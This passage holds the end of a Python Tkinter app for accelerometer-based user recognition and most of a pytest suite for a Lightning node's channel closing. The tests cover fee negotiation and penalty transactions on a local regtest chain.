recognize_thread = threading.Thread(target=test, args=[information, but])
recognize_thread.start()
v0.mainloop()
def mainScreen():
global addUser
global recognizeUser
global global_frame
global v0
global train_thread
global recognize_thread
terminate_thread(train_thread)
terminate_thread(recognize_thread)
v0.configure(background='white')
v0.option_add("*Font", "TkDefaultFont")
if global_frame is not None:
global_frame.destroy()
global_frame = Frame(v0)
global_frame.configure(background='white')
var = StringVar()
label = Label(global_frame, textvariable=var, bg='black', fg='white', anchor="w", pady=8, padx=15)
var.set("User recognition")
label.pack(fill=BOTH, expand=1)
info = StringVar()
information = Label(global_frame, textvariable=info, pady=30, padx=30)
information.configure(background="white")
info.set("Choose \"Add user\" to incorporate a new user to the system. \n"
"Choose \"Recognize user\" to identify a user that is already \nregistered on the system.")
information.pack()
but_frame = Frame(global_frame)
addUser = Button(but_frame, text="Add user", command=add, bg='#8A8A8A', fg='white', relief=FLAT, padx=20, pady=4)
addUser.pack(side=LEFT, padx=10, pady=5)
recognizeUser = Button(but_frame, text="Recognize user", bg='white', command=recognize, relief=FLAT, padx=5, pady=4)
recognizeUser.pack(side=LEFT, padx=10, pady=5)
but_frame.configure(background='white')
but_frame.pack(side=BOTTOM)
v0.bind('<Button-1>', keep_flat)
v0.bind('<Button-2>', keep_flat)
global_frame.pack()
v0.mainloop()
def main():
global model
rest = Activity('0', 'resting', 10)
model.addActivity(rest)
walk = Activity('1', 'walking', 10)
model.addActivity(walk)
run = Activity('2', 'running', 10)
model.addActivity(run)
jump = Activity('3', 'jumping', 10)
model.addActivity(jump)
with open('data.arff', 'a+') as input_file, open('data.csv', 'a+') as output_file:
users = '{'
for x in range(0, len(model.getUsers())):
users += str(x) + ','
users = users[:-1]
users += '}'
activities = '{'
for x in range(0, len(model.getActivities())):
activities += str(x) + ','
activities = activities[:-1]
activities += '}'
if os.stat(input_file.name).st_size == 0:
user = User('0')
model.addUser(user)
users = '{0}'
output_file.write(
'@relation \'Accelerometer: -C 2\'\n\n@attribute activity- ' + activities + '\n@attribute user- ' + users + '\n@attribute x numeric\n@attribute y numeric\n@attribute z numeric\n\n@data\n')
else:
input_file.seek(0)  # 'a+' may leave the read pointer at EOF, so rewind before reading
for line in input_file:
if '@attribute activity- ' in line:
output_file.write('@attribute activity- ' + activities + '\n')
elif '@attribute user- ' in line:
output_file.write(line)
aux = line.split(' ')
aux[2] = aux[2][:-2]
aux[2] = aux[2][1:]
us = aux[2].split(',')
for x in us:
user = User(x)
model.addUser(user)
else:
output_file.write(line)
if os.path.isfile('./data.arff'):
os.remove('./data.arff')
os.rename('./data.csv', './data.arff')
mainScreen()
if __name__ == '__main__':
main()
|
test_closing.py
|
from fixtures import * # noqa: F401,F403
from flaky import flaky
from pyln.client import RpcError, Millisatoshi
from shutil import copyfile
from pyln.testing.utils import SLOW_MACHINE
from utils import (
only_one, sync_blockheight, wait_for, TIMEOUT,
account_balance, first_channel_id, closing_fee, TEST_NETWORK,
scriptpubkey_addr, calc_lease_fee, EXPERIMENTAL_FEATURES,
check_utxos_channel, anchor_expected, check_coin_moves,
check_balance_snaps, mine_funding_to_announce
)
import os
import queue
import pytest
import re
import subprocess
import threading
import unittest
@pytest.mark.developer("Too slow without --dev-bitcoind-poll")
def test_closing_simple(node_factory, bitcoind, chainparams):
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
l1, l2 = node_factory.line_graph(2, opts={'plugin': coin_mvt_plugin})
chan = l1.get_channel_scid(l2)
channel_id = first_channel_id(l1, l2)
fee = closing_fee(3750, 2) if not chainparams['elements'] else 4263
l1.pay(l2, 200000000)
assert bitcoind.rpc.getmempoolinfo()['size'] == 0
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
assert billboard == ['CHANNELD_NORMAL:Funding transaction locked.']
billboard = only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status']
assert billboard == ['CHANNELD_NORMAL:Funding transaction locked.']
bitcoind.generate_block(5)
wait_for(lambda: len(l1.getactivechannels()) == 2)
wait_for(lambda: len(l2.getactivechannels()) == 2)
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
# This may either be from a local_update or an announce, so just
# check for the substring
assert 'CHANNELD_NORMAL:Funding transaction locked.' in billboard[0]
l1.rpc.close(chan)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool.
l1.daemon.wait_for_log('sendrawtx exit 0')
l2.daemon.wait_for_log('sendrawtx exit 0')
# Both nodes should have disabled the channel in their view
wait_for(lambda: len(l1.getactivechannels()) == 0)
wait_for(lambda: len(l2.getactivechannels()) == 0)
assert bitcoind.rpc.getmempoolinfo()['size'] == 1
# Now grab the close transaction
closetxid = only_one(bitcoind.rpc.getrawmempool(False))
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
assert billboard == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of {} satoshi for tx:{}'.format(fee, closetxid),
]
bitcoind.generate_block(1)
l1.daemon.wait_for_log(r'Owning output.* \(SEGWIT\).* txid %s.* CONFIRMED' % closetxid)
l2.daemon.wait_for_log(r'Owning output.* \(SEGWIT\).* txid %s.* CONFIRMED' % closetxid)
# Make sure both nodes have grabbed their close tx funds
assert closetxid in set([o['txid'] for o in l1.rpc.listfunds()['outputs']])
assert closetxid in set([o['txid'] for o in l2.rpc.listfunds()['outputs']])
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status'] == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of {} satoshi for tx:{}'.format(fee, closetxid),
'ONCHAIN:Tracking mutual close transaction',
'ONCHAIN:All outputs resolved: waiting 99 more blocks before forgetting channel'
])
bitcoind.generate_block(9)
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status'] == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of {} satoshi for tx:{}'.format(fee, closetxid),
'ONCHAIN:Tracking mutual close transaction',
'ONCHAIN:All outputs resolved: waiting 90 more blocks before forgetting channel'
])
# Make sure both have forgotten about it
bitcoind.generate_block(90)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 0)
wait_for(lambda: len(l2.rpc.listchannels()['channels']) == 0)
# The entry in the channels table should still be there
assert l1.db_query("SELECT count(*) as c FROM channels;")[0]['c'] == 1
assert l2.db_query("SELECT count(*) as c FROM channels;")[0]['c'] == 1
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
expected_1 = {
'0': [('wallet', ['deposit'], ['withdrawal'], 'A')],
'A': [('wallet', ['deposit'], None, None), ('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
'B': [('wallet', ['deposit'], None, None)],
}
expected_2 = {
'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
'B': [('wallet', ['deposit'], None, None)],
}
tags = check_utxos_channel(l1, [channel_id], expected_1)
check_utxos_channel(l2, [channel_id], expected_2, tags)
def test_closing_while_disconnected(node_factory, bitcoind, executor):
l1, l2 = node_factory.line_graph(2, opts={'may_reconnect': True})
chan = l1.get_channel_scid(l2)
l1.pay(l2, 200000000)
l2.stop()
# The close should still be triggered afterwards.
fut = executor.submit(l1.rpc.close, chan, 0)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.start()
fut.result(TIMEOUT)
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool.
l1.daemon.wait_for_log('sendrawtx exit 0')
l2.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(101)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 0)
wait_for(lambda: len(l2.rpc.listchannels()['channels']) == 0)
def test_closing_disconnected_notify(node_factory, bitcoind, executor):
l1, l2 = node_factory.line_graph(2)
l1.pay(l2, 200000000)
l2.stop()
wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
out = subprocess.check_output(['cli/thor-cli',
'--network={}'.format(TEST_NETWORK),
'--thor-dir={}'
.format(l1.daemon.thor_dir),
'close',
l2.info['id'],
'5']).decode('utf-8').splitlines()
assert out[0] == '# peer is offline, will negotiate once they reconnect (5 seconds before unilateral close).'
assert out[1] == '# Timed out, forcing close.'
assert not any([line.startswith('#') for line in out[2:]])
def test_closing_id(node_factory):
"""Test closing using peer ID and full channel ID
"""
l1, l2 = node_factory.get_nodes(2)
# Close by full channel ID.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**6)
cid = l2.rpc.listpeers()['peers'][0]['channels'][0]['channel_id']
l2.rpc.close(cid)
wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
wait_for(lambda: not only_one(l2.rpc.listpeers(l1.info['id'])['peers'])['connected'])
# Close by peer ID.
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l1.daemon.wait_for_log("Handed peer, entering loop")
l2.fundchannel(l1, 10**6)
pid = l1.info['id']
l2.rpc.close(pid)
wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
wait_for(lambda: not only_one(l2.rpc.listpeers(l1.info['id'])['peers'])['connected'])
@unittest.skipIf(TEST_NETWORK != 'regtest', 'FIXME: broken under elements')
@pytest.mark.slow_test
def test_closing_different_fees(node_factory, bitcoind, executor):
l1 = node_factory.get_node()
# Default feerate = 15000/11000/7500/1000
# It will start at the second number, accepting anything above the first.
feerates = [[20000, 11000, 15000, 7400], [8000, 6000, 1001, 100]]
balance = [False, True]
num_peers = len(feerates) * len(balance)
addr = l1.rpc.newaddr()['bech32']
bitcoind.rpc.sendtoaddress(addr, 1)
numfunds = len(l1.rpc.listfunds()['outputs'])
bitcoind.generate_block(1)
wait_for(lambda: len(l1.rpc.listfunds()['outputs']) > numfunds)
# Create them in a batch, for speed!
peers = []
for feerate in feerates:
for b in balance:
p = node_factory.get_node(feerates=feerate)
p.feerate = feerate
p.balance = b
l1.rpc.connect(p.info['id'], 'localhost', p.port)
peers.append(p)
for p in peers:
p.channel = l1.rpc.fundchannel(p.info['id'], 10**6, minconf=0)['channel_id']
# Technically, this is async to fundchannel returning.
l1.daemon.wait_for_log('sendrawtx exit 0')
mine_funding_to_announce(bitcoind, peers, num_blocks=6)
# Now wait for them all to hit normal state, do payments
l1.daemon.wait_for_logs(['update for channel .* now ACTIVE'] * num_peers
+ ['to CHANNELD_NORMAL'] * num_peers)
for p in peers:
if p.balance:
l1.pay(p, 100000000)
# Now close all channels (not unilaterally!)
closes = [executor.submit(l1.rpc.close, p.channel, 0) for p in peers]
for c in closes:
c.result(90)
# close does *not* wait for the sendrawtransaction, so do that!
# Note that since they disagree on the ideal fee, they may conflict
# (first one in will win), so we cannot look at logs, we need to
# wait for mempool.
wait_for(lambda: bitcoind.rpc.getmempoolinfo()['size'] == num_peers)
bitcoind.generate_block(1)
for p in peers:
p.daemon.wait_for_log(' to ONCHAIN')
wait_for(lambda: 'ONCHAIN:Tracking mutual close transaction' in only_one(p.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status'])
l1.daemon.wait_for_logs([' to ONCHAIN'] * num_peers)
@pytest.mark.developer("needs DEVELOPER=1")
def test_closing_negotiation_reconnect(node_factory, bitcoind):
disconnects = ['-WIRE_CLOSING_SIGNED',
'+WIRE_CLOSING_SIGNED']
l1, l2 = node_factory.line_graph(2, opts=[{'disconnect': disconnects,
'may_reconnect': True},
{'may_reconnect': True}])
l1.pay(l2, 200000000)
assert bitcoind.rpc.getmempoolinfo()['size'] == 0
l1.rpc.close(l2.info['id'])
l1.daemon.wait_for_log(r'State changed from CHANNELD_NORMAL to CHANNELD_SHUTTING_DOWN')
l2.daemon.wait_for_log(r'State changed from CHANNELD_NORMAL to CHANNELD_SHUTTING_DOWN')
# Now verify that the closing tx is in the mempool.
bitcoind.generate_block(6, wait_for_mempool=1)
sync_blockheight(bitcoind, [l1, l2])
for n in [l1, l2]:
# Ensure we actually got a mutual close.
n.daemon.wait_for_log(r'Resolved FUNDING_TRANSACTION/FUNDING_OUTPUT by MUTUAL_CLOSE')
@pytest.mark.developer("needs DEVELOPER=1")
def test_closing_specified_destination(node_factory, bitcoind, chainparams):
l1, l2, l3, l4 = node_factory.get_nodes(4)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.connect(l3.info['id'], 'localhost', l3.port)
l1.rpc.connect(l4.info['id'], 'localhost', l4.port)
chan12, _ = l1.fundchannel(l2, 10**6)
chan13, _ = l1.fundchannel(l3, 10**6)
chan14, _ = l1.fundchannel(l4, 10**6)
l1.pay(l2, 100000000)
l1.pay(l3, 100000000)
l1.pay(l4, 100000000)
mine_funding_to_announce(bitcoind, [l1, l2, l3, l4])
addr = chainparams['example_addr']
l1.rpc.close(chan12, None, addr)
l1.rpc.call('close', {'id': chan13, 'destination': addr})
l1.rpc.call('close', [chan14, None, addr])
l1.daemon.wait_for_logs([' to CLOSINGD_SIGEXCHANGE'] * 3)
# Both nodes should have disabled the channel in their view
wait_for(lambda: len(l1.getactivechannels()) == 0)
wait_for(lambda: bitcoind.rpc.getmempoolinfo()['size'] == 3)
# Now grab the close transaction
closetxs = {}
for i, n in enumerate([l2, l3, l4]):
billboard = only_one(l1.rpc.listpeers(n.info['id'])['peers'][0]['channels'])['status'][0]
m = re.search(r'CLOSINGD_SIGEXCHANGE.* tx:([a-f0-9]{64})', billboard)
closetxs[n] = m.group(1)
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l1, l2, l3, l4])
# l1 can't spend the output to addr.
for txid in closetxs.values():
assert not l1.daemon.is_in_log(r'Owning output.* \(SEGWIT\).* txid {}.* CONFIRMED'.format(txid))
# Check the txid has at least 1 confirmation
for n, txid in closetxs.items():
n.daemon.wait_for_log(r'Owning output.* \(SEGWIT\).* txid {}.* CONFIRMED'.format(txid))
for n in [l2, l3, l4]:
# Make sure both nodes have grabbed their close tx funds
closetx = closetxs[n]
outputs = n.rpc.listfunds()['outputs']
assert closetx in set([o['txid'] for o in outputs])
output_num2 = [o for o in outputs if o['txid'] == closetx][0]['output']
output_num1 = 0 if output_num2 == 1 else 1
# Check that the other output's address is addr
assert addr == scriptpubkey_addr(bitcoind.rpc.gettxout(closetx, output_num1)['scriptPubKey'])
assert 1 == bitcoind.rpc.gettxout(closetx, output_num1)['confirmations']
def closing_negotiation_step(node_factory, bitcoind, chainparams, opts):
def feerate_for(target, minimum=0, maximum=10000000):
"""Binary search to find feerate"""
assert minimum != maximum
mid = (minimum + maximum) // 2
mid_fee = closing_fee(mid, 1)
if mid_fee > target:
return feerate_for(target, minimum, mid)
elif mid_fee < target:
return feerate_for(target, mid, maximum)
else:
return mid
orate = feerate_for(21000) # closing fee negotiation starts at 21000
prate = feerate_for(20000) # closing fee negotiation starts at 20000
opener, peer = node_factory.line_graph(2, opts=[{'feerates': (orate, orate, orate, orate)},
{'feerates': (prate, prate, prate, prate)}])
opener_id = opener.info['id']
peer_id = peer.info['id']
assert bitcoind.rpc.getmempoolinfo()['size'] == 0
if opts['close_initiated_by'] == 'opener':
opener.rpc.close(peer_id=peer_id, fee_negotiation_step=opts['fee_negotiation_step'])
else:
assert opts['close_initiated_by'] == 'peer'
peer.rpc.close(peer_id=opener_id, fee_negotiation_step=opts['fee_negotiation_step'])
# Get the proclaimed closing fee from the two nodes' statuses
status_agreed_regex = re.compile("agreed on a closing fee of ([0-9]+) satoshi")
# [fee_from_opener_status, fee_from_peer_status]
fees_from_status = [None, None]
def get_fee_from_status(node, peer_id, i):
nonlocal fees_from_status
peer = only_one(node.rpc.listpeers(peer_id)['peers'])
channel = only_one(peer['channels'])
status = channel['status'][0]
m = status_agreed_regex.search(status)
if not m:
return False
fees_from_status[i] = int(m.group(1))
return True
wait_for(lambda: get_fee_from_status(opener, peer_id, 0))
wait_for(lambda: get_fee_from_status(peer, opener_id, 1))
assert opts['expected_close_fee'] == fees_from_status[0]
assert opts['expected_close_fee'] == fees_from_status[1]
# Get the closing transaction from the bitcoind mempool and get its fee
mempool = None
mempool_tx_ids = None
def get_mempool_when_size_1():
nonlocal mempool, mempool_tx_ids
mempool = bitcoind.rpc.getrawmempool(True)
mempool_tx_ids = list(mempool.keys())
return len(mempool_tx_ids) == 1
wait_for(get_mempool_when_size_1)
close_tx_id = mempool_tx_ids[0]
# v22.99.0-8fe6f5a6fbcd at least doesn't have 'fee', it has 'fees'.
if 'fees' in mempool[close_tx_id]:
fee_mempool = round(mempool[close_tx_id]['fees']['base'] * 10**8)
else:
fee_mempool = round(mempool[close_tx_id]['fee'] * 10**8)
assert opts['expected_close_fee'] == fee_mempool
@unittest.skipIf(EXPERIMENTAL_FEATURES, "anchors uses quick-close, not negotiation")
@unittest.skipIf(TEST_NETWORK == 'liquid-regtest', "Different closing fees")
def test_closing_negotiation_step_30pct(node_factory, bitcoind, chainparams):
"""Test that the closing fee negotiation step works, 30%"""
opts = {}
opts['fee_negotiation_step'] = '30%'
opts['close_initiated_by'] = 'opener'
opts['expected_close_fee'] = 20537
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
opts['close_initiated_by'] = 'peer'
opts['expected_close_fee'] = 20233
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
@unittest.skipIf(EXPERIMENTAL_FEATURES, "anchors uses quick-close, not negotiation")
@unittest.skipIf(TEST_NETWORK == 'liquid-regtest', "Different closing fees")
def test_closing_negotiation_step_100pct(node_factory, bitcoind, chainparams):
"""Test that the closing fee negotiation step works, 100%"""
opts = {}
opts['fee_negotiation_step'] = '100%'
opts['close_initiated_by'] = 'opener'
opts['expected_close_fee'] = 20001
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
# The close fee of 20499 looks strange in this case - one would expect
# to have a number close to 21000. This is because
# * the range is initially set to [20000 (peer), 21000 (opener)]
# * the opener is always first to propose; since the peer initiated the close,
#   the opener uses the default 50% step and proposes 20500
# * the range is narrowed to [20001, 20499] and the peer proposes 20499
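# A worked sketch of that narrowing (comments only, nothing here executes):
#   round 1: opener proposes (20000 + 21000) / 2 = 20500 -> range becomes [20001, 20499]
#   round 2: the peer, using its 100% step, crosses the whole remaining range and proposes 20499
# which is why expected_close_fee below is 20499 rather than something near 21000.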
opts['close_initiated_by'] = 'peer'
opts['expected_close_fee'] = 20499
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
@unittest.skipIf(EXPERIMENTAL_FEATURES, "anchors uses quick-close, not negotiation")
@unittest.skipIf(TEST_NETWORK == 'liquid-regtest', "Different closing fees")
def test_closing_negotiation_step_1sat(node_factory, bitcoind, chainparams):
"""Test that the closing fee negotiation step works, 1sat"""
opts = {}
opts['fee_negotiation_step'] = '1'
opts['close_initiated_by'] = 'opener'
opts['expected_close_fee'] = 20989
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
opts['close_initiated_by'] = 'peer'
opts['expected_close_fee'] = 20010
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
@unittest.skipIf(EXPERIMENTAL_FEATURES, "anchors uses quick-close, not negotiation")
@unittest.skipIf(TEST_NETWORK == 'liquid-regtest', "Different closing fees")
def test_closing_negotiation_step_700sat(node_factory, bitcoind, chainparams):
"""Test that the closing fee negotiation step works, 700sat"""
opts = {}
opts['fee_negotiation_step'] = '700'
opts['close_initiated_by'] = 'opener'
opts['expected_close_fee'] = 20151
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
opts['close_initiated_by'] = 'peer'
opts['expected_close_fee'] = 20499
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
@pytest.mark.developer("needs dev-disable-commit-after")
def test_penalty_inhtlc(node_factory, bitcoind, executor, chainparams):
"""Test penalty transaction with an incoming HTLC"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# We suppress each one after the first commit; the HTLC gets added but not fulfilled.
# Feerates identical so we don't get gratuitous commit to update them
l1, l2 = node_factory.line_graph(2, opts=[{'dev-disable-commit-after': 1,
'may_fail': True,
'feerates': (7500, 7500, 7500, 7500),
'allow_broken_log': True,
'plugin': coin_mvt_plugin},
{'dev-disable-commit-after': 1,
'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
# Now, this will get stuck due to l1 commit being disabled..
t = executor.submit(l1.pay, l2, 100000000)
assert len(l1.getactivechannels()) == 2
assert len(l2.getactivechannels()) == 2
# They should both have commitments blocked now.
l1.daemon.wait_for_log('dev-disable-commit-after: disabling')
l2.daemon.wait_for_log('dev-disable-commit-after: disabling')
# Make sure l1 got l2's commitment to the HTLC, and sent to master.
l1.daemon.wait_for_log('got commitsig')
# Take our snapshot.
tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Let them continue
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Should fulfill.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_out WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Payment should now complete.
t.result(timeout=10)
# Now we really mess things up!
bitcoind.rpc.sendrawtransaction(tx)
bitcoind.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
# FIXME: l1 should try to stumble along!
wait_for(lambda: len(l2.getactivechannels()) == 0)
# l2 should spend all of the outputs (except to-us).
# Could happen in any order, depending on commitment tx.
needle = l2.daemon.logsearch_start
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM')
l2.daemon.logsearch_start = needle
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/THEIR_HTLC')
# FIXME: test HTLC tx race!
bitcoind.generate_block(100)
sync_blockheight(bitcoind, [l1, l2])
wait_for(lambda: len(l2.rpc.listpeers()['peers']) == 0)
# Do one last pass over the logs to extract the reactions l2 sent
l2.daemon.logsearch_start = needle
needles = [
# The first needle will match, but since we don't have a direct output
# for l2 it won't result in an output, hence the comment:
# r'Resolved FUNDING_TRANSACTION/FUNDING_OUTPUT by THEIR_REVOKED_UNILATERAL .([a-f0-9]{64}).',
r'Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by our proposal OUR_PENALTY_TX .([a-f0-9]{64}).',
r'Resolved THEIR_REVOKED_UNILATERAL/THEIR_HTLC by our proposal OUR_PENALTY_TX .([a-f0-9]{64}).',
]
matches = list(map(l2.daemon.is_in_log, needles))
# Now extract the txids for these responses
txids = set([re.search(r'\(([0-9a-f]{64})\)', m).group(1) for m in matches])
# We should have one confirmed output for each of the above reactions in
# the list of funds we own.
outputs = l2.rpc.listfunds()['outputs']
assert [o['status'] for o in outputs] == ['confirmed'] * 2
assert set([o['txid'] for o in outputs]) == txids
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
# l1 loses all of their channel balance to the peer, as penalties
expected_1 = {
'0': [('wallet', ['deposit'], ['withdrawal'], 'A')],
'A': [('wallet', ['deposit'], None, None), ('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
'B': [('external', ['penalty'], None, None), ('external', ['penalty'], None, None)],
}
# l2 sweeps all of l1's closing outputs
expected_2 = {
'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
'B': [('cid1', ['penalty'], ['to_wallet'], 'C'), ('cid1', ['penalty'], ['to_wallet'], 'D')],
'C': [('wallet', ['deposit'], None, None)],
'D': [('wallet', ['deposit'], None, None)]
}
if anchor_expected():
expected_1['B'].append(('external', ['anchor'], None, None))
expected_2['B'].append(('external', ['anchor'], None, None))
expected_1['B'].append(('wallet', ['anchor'], None, None))
expected_2['B'].append(('wallet', ['anchor'], None, None))
# We use a subset of tags in expected_2 that are used in expected_1
tags = check_utxos_channel(l1, [channel_id], expected_1)
check_utxos_channel(l2, [channel_id], expected_2, tags)
@pytest.mark.developer("needs dev-disable-commit-after")
def test_penalty_outhtlc(node_factory, bitcoind, executor, chainparams):
"""Test penalty transaction with an outgoing HTLC"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# First we need to get funds to l2, so suppress after second.
# Feerates identical so we don't get gratuitous commit to update them
l1, l2 = node_factory.line_graph(2,
opts=[{'dev-disable-commit-after': 3,
'may_fail': True,
'feerates': (7500, 7500, 7500, 7500),
'allow_broken_log': True,
'plugin': coin_mvt_plugin},
{'dev-disable-commit-after': 3,
'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
# Move some across to l2.
l1.pay(l2, 200000000)
assert not l1.daemon.is_in_log('dev-disable-commit-after: disabling')
assert not l2.daemon.is_in_log('dev-disable-commit-after: disabling')
# Now, this will get stuck due to l1 commit being disabled..
t = executor.submit(l2.pay, l1, 100000000)
# Make sure we get signature from them.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_ADD_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_COMMITMENT_SIGNED')
# They should both have commitments blocked now.
l1.daemon.wait_for_log('dev-disable-commit-after: disabling')
l2.daemon.wait_for_log('dev-disable-commit-after: disabling')
# Make sure both sides got revoke_and_ack for that commitment.
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Take our snapshot.
tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Let them continue
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Thread should complete.
t.result(timeout=10)
# Make sure both sides got revoke_and_ack for final.
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Now we really mess things up!
bitcoind.rpc.sendrawtransaction(tx)
bitcoind.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
# FIXME: l1 should try to stumble along!
# l2 should spend all of the outputs (except to-us).
# Could happen in any order, depending on commitment tx.
needle = l2.daemon.logsearch_start
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM')
l2.daemon.logsearch_start = needle
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/OUR_HTLC')
l2.daemon.logsearch_start = needle
l2.daemon.wait_for_log('Ignoring output.*: THEIR_REVOKED_UNILATERAL/OUTPUT_TO_US')
# FIXME: test HTLC tx race!
# 100 blocks later, all resolved.
bitcoind.generate_block(100)
sync_blockheight(bitcoind, [l1, l2])
wait_for(lambda: len(l2.rpc.listpeers()['peers']) == 0)
# Do one last pass over the logs to extract the reactions l2 sent
l2.daemon.logsearch_start = needle
needles = [
r'Resolved FUNDING_TRANSACTION/FUNDING_OUTPUT by THEIR_REVOKED_UNILATERAL .([a-f0-9]{64}).',
r'Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by our proposal OUR_PENALTY_TX .([a-f0-9]{64}).',
r'Resolved THEIR_REVOKED_UNILATERAL/OUR_HTLC by our proposal OUR_PENALTY_TX .([a-f0-9]{64}).',
]
matches = list(map(l2.daemon.is_in_log, needles))
# Now extract the txids for these responses
txids = set([re.search(r'\(([0-9a-f]{64})\)', m).group(1) for m in matches])
# We should have one confirmed output for each of the above reactions in
# the list of funds we own.
outputs = l2.rpc.listfunds()['outputs']
assert [o['status'] for o in outputs] == ['confirmed'] * 3
assert set([o['txid'] for o in outputs]) == txids
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
# l1 loses all of their channel balance to the peer, as penalties
expected_1 = {
'0': [('wallet', ['deposit'], ['withdrawal'], 'A')],
'A': [('wallet', ['deposit'], None, None), ('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
'B': [('external', ['penalty'], None, None), ('external', ['penalty'], None, None), ('external', ['penalty'], None, None)],
}
# l2 sweeps all of l1's closing outputs
expected_2 = {
'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
'B': [('wallet', ['channel_close'], None, None), ('cid1', ['penalty'], ['to_wallet'], 'C'), ('cid1', ['penalty'], ['to_wallet'], 'D')],
'C': [('wallet', ['deposit'], None, None)],
'D': [('wallet', ['deposit'], None, None)]
}
if anchor_expected():
expected_1['B'].append(('external', ['anchor'], None, None))
expected_2['B'].append(('external', ['anchor'], None, None))
expected_1['B'].append(('wallet', ['anchor'], None, None))
expected_2['B'].append(('wallet', ['anchor'], None, None))
# We use a subset of tags in expected_2 that are used in expected_1
tags = check_utxos_channel(l1, [channel_id], expected_1)
check_utxos_channel(l2, [channel_id], expected_2, tags)
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@pytest.mark.slow_test
@pytest.mark.developer("requres 'dev-queryrates'")
def test_channel_lease_falls_behind(node_factory, bitcoind):
'''
If our peer falls too far behind/doesn't send us an update for
their blockheight, the lessor fails the channel
'''
opts = [{'funder-policy': 'match', 'funder-policy-mod': 100,
